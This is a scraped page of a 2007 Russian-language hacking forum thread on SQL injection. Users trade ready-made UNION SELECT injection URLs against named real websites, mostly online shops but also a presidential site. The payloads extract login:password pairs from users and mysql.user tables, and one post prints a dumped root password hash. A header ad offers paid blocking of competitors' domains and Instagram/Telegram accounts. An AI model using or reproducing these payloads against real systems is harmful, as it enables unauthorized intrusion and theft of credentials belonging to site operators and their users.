Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 106 из 1242

106

Опции темы

Поиск в этой теме

Опции просмотра

#1051

15.03.2007, 19:46

Ksander

Постоянный

Регистрация: 21.06.2006

Сообщений: 931

Провел на форуме:
4836047

Репутация: 930

Кто себе новый комп хочет ?=)

Код:

http://notes.asdplus.ru/shop/showbrand.php?brand=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,log,18,19,20+from+users+limit+6,1/*

Тут прикупить книжки и диски для компа =)

Код:

http://www.saranagati.net/shop/index.php?p=list&cid=-1+union+select+concat(login,char(58),password)+from+users/*

p.s.у меня чето все скули по темам идут =)

Последний раз редактировалось Ksander; 15.03.2007 в 19:50..

#1052

15.03.2007, 19:57

Colkru

Участник форума

Регистрация: 13.01.2007

Сообщений: 160

Провел на форуме:
865816

Репутация: 181

Отправить сообщение для Colkru с помощью ICQ

http://studybank.info/viewdetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(u sername,char(58),passwd),14+from+user+limit+0,1/*

Пассы в чистом виде)

#1053

15.03.2007, 20:46

Ksander

Постоянный

Регистрация: 21.06.2006

Сообщений: 931

Провел на форуме:
4836047

Репутация: 930

Чтобы как то компенсировать казус с мейлом вот:

http://hotel.travel.rambler.ru

Правда там mssql

Код:

http://hotel.travel.rambler.ru/vitrina.asp?sDescr=-1

так чтоли ?

Код:

http://hotel.travel.rambler.ru/vitrina.asp?sDescr=-1+union+all+select+1 bla bla bla---

#1054

15.03.2007, 21:02

Colkru

Участник форума

Регистрация: 13.01.2007

Сообщений: 160

Провел на форуме:
865816

Репутация: 181

А вот и мой ШОП

Код:

http://www.pikanteria.pl/towar.php?poz=subtelny&gr=sexi%20stroje&podgr=sukienki&id=-1+union+select+1,2,3,4,5,6,concat(user,char(58),pass),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+users/*

#1055

15.03.2007, 21:11

Ksander

Постоянный

Регистрация: 21.06.2006

Сообщений: 931

Провел на форуме:
4836047

Репутация: 930

Те кто хочет себе косметику сюда =)

marykay.freshop.ru

Табл.запарился подбирать.

Код:

http://marykay.freshop.ru/good.php?id=-1+union+select+1,version(),3,4,5,6,7,8/*

#1056

15.03.2007, 21:16

MegaDeth

Участник форума

Регистрация: 08.11.2006

Сообщений: 208

Провел на форуме:
1038169

Репутация: 184

http://www.aidan-gallery.ru/cgi/wgal.cgi?gid=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16+FROM+users/*
фух устал, скока же вас там %)
а на есламе - в таблице юзверс две записи, поле с логином.. гадал долго, nick! =) password,email,id
куда их вводить хз, и пассы не шифрованые даже... от форума не совпали от админа, там бб какойто

#1057

15.03.2007, 21:33

XTErner

Участник форума

Регистрация: 13.03.2007

Сообщений: 120

Провел на форуме:
1604641

Репутация: 590

Код:

http://www.metro.waw.pl/page.php?id=+1+union+select+database(),user()/*

Код:

http://www.arclub-nsk.ru/dynamic.html?sec=-4&id=-1+union+select+1,database(),3,4/*

Код:

http://www.ohota-ribalka.com.ua/rehunt_1.htm?id=- 1+union+select+1,user,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2
2,23,24,25,26,27,28,29,30+from+mysql.user/*

Код:

http://www.moottoriliitto.fi/page.php?id=10+union+select+password+from+mysql.user+limit+1,1/*&type=muutsivut&page=6

Код:

http://www.promservice.com/index.php?page=news&lang=ru&id=-1+union+select+1,2,concat(e_mail,0x3a),4+from+users/*

Код:

http://www.buhgalteria.com.ua/Hit.html?id=-1+union+select+1,2,3,4,5,6,7,convert(concat(user,0x3a,password)%20using%20cp1251)%20+from+mysql.user/*

Код:

http://basic.forumservice.nl/lees.php?id=1&mid=-41+union+select+1,2,3,4,concat(password,0x3a,user),6,7,8+from+mysql.user/

#1058

15.03.2007, 21:40

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Отправить сообщение для n1†R0x с помощью ICQ

Код:

http://www.domkino.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+user/

#1059

15.03.2007, 22:01

Ksander

Постоянный

Регистрация: 21.06.2006

Сообщений: 931

Провел на форуме:
4836047

Репутация: 930

Монголия хекд!

www.president.mn

Код:

http://www.president.mn/show_module.php?index=dayinfo&dayinfoid=-1+union+select+1,concat(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14+from+user+limit+0,1/*

p.s.

Цитата:

Сообщение от _Pantera_

from+prgp_category_m/*

Как удалось табл.подобрать ? Оо

#1060

15.03.2007, 22:09

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Код:

http://www.mobu.ru/download.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

регистрации вроде нет, доступ в админку через .htaccess

но все же)

Код:

http://www.hushpuppies.ru/cat_item.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5+from+mysql.user/*

root:*9B56E42584D2F6F2CCF6039BA43F1039CAAD7C97

mysql5

Код:

http://shop.turistua.com/index.php?x_id=-1+union+select+version()/*

это просто так

Страница 106 из 1242

106

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход